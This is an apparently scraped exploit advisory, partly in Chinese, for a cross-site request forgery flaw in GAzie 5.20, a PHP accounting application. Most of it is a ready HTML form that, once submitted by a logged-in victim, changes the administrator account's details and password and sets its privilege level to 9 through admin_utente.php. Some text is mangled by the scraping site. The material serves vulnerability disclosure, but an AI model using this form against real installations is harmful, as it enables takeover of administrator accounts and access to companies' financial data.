标题:GAzie <= 5.20 Cross Site Request Forgery ======================================== 作者: giudinvx HdhCmsTest2cto测试数据 <giudinvx[at]gmail[dot]com> 网站: http://HdhCmsTestgiudinvx.altervista.org/ -------------------------------------------------------- @程序信息: Multicompany finance application written in PHP using a MySql database backend for small to medium enterprise. It lets you write invoices, manage stock, manage orders , accounting, etc. Send tax receipt to electronic cash register. @Version 5.20 http://sourceforge.net/projects/gazie/ -------------------------------------------------------- ==============[[ -测试代码- ]]============== <form enctype="multipart/form-data" action="[ HdhCmsTest2cto测试数据 ]/modules/config/admin_utente.php?Login=amministratore&Update" method="POST"> <input type="hidden" name="Login" value="amministratore"> <input type="hidden" value="" name="Update"> <input type="text" value="Surname " name="Cognome" title="Cognome"> <input type="text" value="Name " name="Nome" title="Nome"> <input type="text" value="italian" name="lang"> <input type="text" value="9" name="Abilit"><br/> Password <input type="password" value="" name="Password"><br/><!-- at least eight alphanumeric characters --> Repeat password <input type="password" value="" name="confpass"><br/> <input type="submit" value="START THE GAME" name="Submit"> </form>
查看更多关于GAzie <= 5.20跨站请求伪造及修复 - 网站安全 - 自的详细内容...